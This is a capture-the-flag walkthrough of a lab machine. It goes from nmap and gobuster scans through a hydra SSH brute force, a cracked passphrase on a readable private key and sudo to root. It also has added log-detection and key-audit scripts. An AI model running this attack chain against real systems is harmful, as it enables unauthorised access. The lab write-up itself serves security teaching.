1. Deploy the machine and connect to our network.
2. Find the services exposed by the machine
```
root@ip-10-10-141-237:~# nmap 10.10.4.205
Starting Nmap 7.60 ( https://nmap.org ) at 2020-11-26 12:47 GMT
Nmap scan report for ip-10-10-4-205.eu-west-1.compute.internal (10.10.4.205)
Host is up (0.0013s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 02:80:3B:1E:CD:4F (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.69 seconds
```
3. What is the name of the hidden directory on the web server (enter name without /)?
```
root@ip-10-10-141-237:~# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -u http://10.10.4.205
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.4.205
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/26 12:51:39 Starting gobuster
===============================================================
/development (Status: 301)
===============================================================
2020/11/26 12:51:51 Finished
===============================================================
```
:heavy_check_mark: The hidden directory is development.
The directory itself doesn't seem to contain anything valuable to us.
4. Use brute-forcing to find the username & password
5. What is the username?
From the service scan earlier we see that Samba is running. Let's see what we can find there.
```
root@ip-10-10-141-237:~# smbclient -L \\\\10.10.4.205 --no-pass
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            BASIC2
```
We have an Anonymous share. Let's see if there is anything in it.
```
root@ip-10-10-141-237:~# smbclient \\\\10.10.4.205\\Anonymous --no-pass
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 19 18:31:20 2018
  ..                                  D        0  Thu Apr 19 18:13:06 2018
  staff.txt                           N      173  Thu Apr 19 18:29:55 2018

		14318640 blocks of size 1024. 11079768 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (84.5 KiloBytes/sec) (average 84.5 KiloBytes/sec)
```
The staff.txt file contains a message to all staff from one of the staff members, named Kay, and he mentions another person called Jan.
```
root@ip-10-10-141-237:~# cat staff.txt
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, Jan!)

-Kay
```
So a wild guess is that one of these names is the username asked for.
jan was accepted as the correct answer.
6. What is the password?
So we know jan is the username. Now let's use hydra against SSH (which we saw was running in the service scan) to see if we can bruteforce the password. We're using the rockyou.txt password list.
```
root@ip-10-10-141-237:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.4.205 -t 4 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-11-26 12:26:42
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.4.205:22/
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 14344334 to do in 3735:31h, 4 active
[STATUS] 55.67 tries/min, 167 tries in 00:03h, 14344231 to do in 4294:41h, 4 active
[STATUS] 57.71 tries/min, 404 tries in 00:07h, 14343994 to do in 4142:15h, 4 active
[ssh] host: 10.10.4.205   login: jan   password: armando
```
:heavy_check_mark: We got a match! armando is the password.
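Seen from the server side, a hydra run like the one above leaves a very loud trail: about one failed password line per second from a single source in sshd's auth.log, followed eventually by one success. As an added example (not part of the original write-up), this Python script counts failed password attempts per source IP over constructed auth.log lines and flags a source that logs in only after a burst of failures; the sample lines, the threshold and the function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample lines in the syslog format Ubuntu's sshd writes; the
# source IP is the attacking box from the write-up, the host is the target.
SAMPLE_AUTH_LOG = """\
Nov 26 12:26:45 basic2 sshd[1201]: Failed password for jan from 10.10.141.237 port 51230 ssh2
Nov 26 12:26:46 basic2 sshd[1201]: Failed password for jan from 10.10.141.237 port 51230 ssh2
Nov 26 12:26:48 basic2 sshd[1203]: Failed password for jan from 10.10.141.237 port 51232 ssh2
Nov 26 12:26:49 basic2 sshd[1205]: Failed password for jan from 10.10.141.237 port 51234 ssh2
Nov 26 12:26:51 basic2 sshd[1207]: Failed password for jan from 10.10.141.237 port 51236 ssh2
Nov 26 12:30:02 basic2 sshd[1260]: Accepted password for jan from 10.10.141.237 port 52000 ssh2
Nov 26 12:31:10 basic2 sshd[1270]: Failed password for kay from 10.10.4.1 port 40000 ssh2
Nov 26 12:31:40 basic2 sshd[1271]: Accepted publickey for kay from 10.10.4.1 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def analyse_auth_log(text, threshold=5):
    """Return {ip: {"failed": n, "users": {...}, "success_after_failures": bool}}
    for every source IP whose failed password count reaches threshold."""
    stats = defaultdict(lambda: {"failed": 0, "users": set(), "success_after_failures": False})
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # unrelated sshd chatter (disconnects, pam lines)
        s = stats[m["ip"]]
        if m["result"] == "Failed" and m["method"] == "password":
            s["failed"] += 1
            s["users"].add(m["user"])
        elif m["result"] == "Accepted" and s["failed"] >= threshold:
            # a login that succeeds only after a burst of failures is the
            # hallmark of a guessed password rather than a typo
            s["success_after_failures"] = True
    return {ip: s for ip, s in stats.items() if s["failed"] >= threshold}

if __name__ == "__main__":
    for ip, s in analyse_auth_log(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {s['failed']} failed password attempts against {sorted(s['users'])},"
              f" later success: {s['success_after_failures']}")
```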
7. What service do you use to access the server (answer in abbreviation in all caps)?
SSH of course, we just used it to bruteforce the password.
8. Enumerate the machine to find any vectors for privilege escalation
linpeas.sh is a nice script to run to get a quick overview of stuff.
One of the things linpeas found is that kay has left his private SSH key readable by other users.
We really should have been able to check this manually right away on our first look around the system, lesson learned for next time! :smiley:
```
jan@basic2:/dev/shm$ cat /home/kay/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

[base64 key body omitted]
-----END RSA PRIVATE KEY-----
```
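Two things made kay's key usable by another user: the file was readable by jan, and (as the cracking step below shows) it relied on a weak passphrase. As an added example (not part of the original write-up), this Python audit walks a home-directory tree and reports private keys that group/others can read or that lack the legacy PEM encryption header; the directory tree, key bodies and function names are constructed placeholders of mine.

```python
import os
import stat
import tempfile

# Constructed sample key material (placeholders, not real keys): only the
# headers matter, since "Proc-Type: 4,ENCRYPTED" is what marks a legacy PEM
# key as passphrase-protected, exactly as kay's id_rsa above is.
ENCRYPTED_PEM = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                 "DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\n"
                 "AAAA(placeholder)\n-----END RSA PRIVATE KEY-----\n")
PLAIN_PEM = "-----BEGIN RSA PRIVATE KEY-----\nAAAA(placeholder)\n-----END RSA PRIVATE KEY-----\n"

def is_encrypted_key(data):
    """Legacy PEM keys announce a passphrase in a plain-text header. (Keys in the
    newer OpenSSH format keep the cipher name inside the base64 body instead.)"""
    return "Proc-Type: 4,ENCRYPTED" in data[:400]

def audit_private_keys(root):
    """Walk root and return sorted (path, issues) for every id_* / *_rsa key
    that group/others can read or that is stored without a passphrase."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not (name.startswith("id_") or name.endswith("_rsa")):
                continue
            path = os.path.join(dirpath, name)
            issues = []
            if os.stat(path).st_mode & (stat.S_IRGRP | stat.S_IROTH):
                issues.append("readable-by-others")  # what let jan read kay's key
            with open(path, errors="replace") as fh:
                if not is_encrypted_key(fh.read()):
                    issues.append("no-passphrase")
            if issues:
                findings.append((path, issues))
    return sorted(findings)

def build_demo_home():
    """Constructed /home-like tree: kay's encrypted key left world-readable
    (as on the box) and jan's unencrypted key with the correct 0600 mode."""
    root = tempfile.mkdtemp(prefix="keyaudit_")
    for user, body, mode in (("kay", ENCRYPTED_PEM, 0o644), ("jan", PLAIN_PEM, 0o600)):
        ssh_dir = os.path.join(root, user, ".ssh")
        os.makedirs(ssh_dir)
        key = os.path.join(ssh_dir, "id_rsa")
        with open(key, "w") as fh:
            fh.write(body)
        os.chmod(key, mode)
    return root

if __name__ == "__main__":
    for path, issues in audit_private_keys(build_demo_home()):
        print(path, "->", ", ".join(issues))
```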
9. What is the name of the other user you found (all lower case)?
A wild guess here too: that the other name from the staff.txt file is the username.
:heavy_check_mark: Which it is: kay.
(We could also find this by logging in as jan through ssh and looking around, but I took it from the
10. If you have found another user, what can you do with this information?
We could see if we can gain access to kay's account with the help of his exposed private SSH key…
```
ssh -i kay.id_rsa [email protected]
```
But wait! It looks like the private key has a password on it!
Let's try to bruteforce it with the help of john.
First we need to get a hash of the key, which we do with ssh2john.py:
```
root@ip-10-10-141-237:~# python /opt/john/ssh2john.py kay.id_rsa > kay.id_rsa.hash
```
Then let's use john and the rockyou.txt password list to see if we can bruteforce the password!
```
root@ip-10-10-141-237:~# john --wordlist=/usr/share/wordlists/rockyou.txt kay.id_rsa.hash
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (kay.id_rsa)
1g 0:00:00:11 DONE (2020-11-27 13:38) 0.08481g/s 1216Kp/s 1216Kc/s 1216KC/s *7¡Vamos!
```
:heavy_check_mark: BOOM! Password found.
11. What is the final password you obtain?
Now that we have the private key password, we can log in as kay.
From earlier enumeration as the user jan I remembered that there was a pass.bak file in kay's home directory.
Let's take a peek at what it contains.
```
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
```
:heavy_check_mark: A password! Perfect!
What else we see in kay's home directory is a file called .sudo_as_admin_successful, which indicates that kay most likely can use sudo to gain root. And hopefully the password in the pass.bak file is his current password.
Let's try! (We could also check with
```
kay@basic2:~$ sudo su
[sudo] password for kay:
root@basic2:/home/kay#
```
Just out of curiosity, let's see what's in /root.
```
root@basic2:/home/kay# ls /root/
.bash_history  .bashrc  flag.txt  .nano/  .profile
root@basic2:/home/kay# cat /root/flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you'll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send me a link! I can be reached at [email protected]. If you've got questions or feedback, please reach out to me. Happy hacking!
```
Hang on there! More than one way to do this box? What other ways might there be?! I have to check this out in the future :smiley: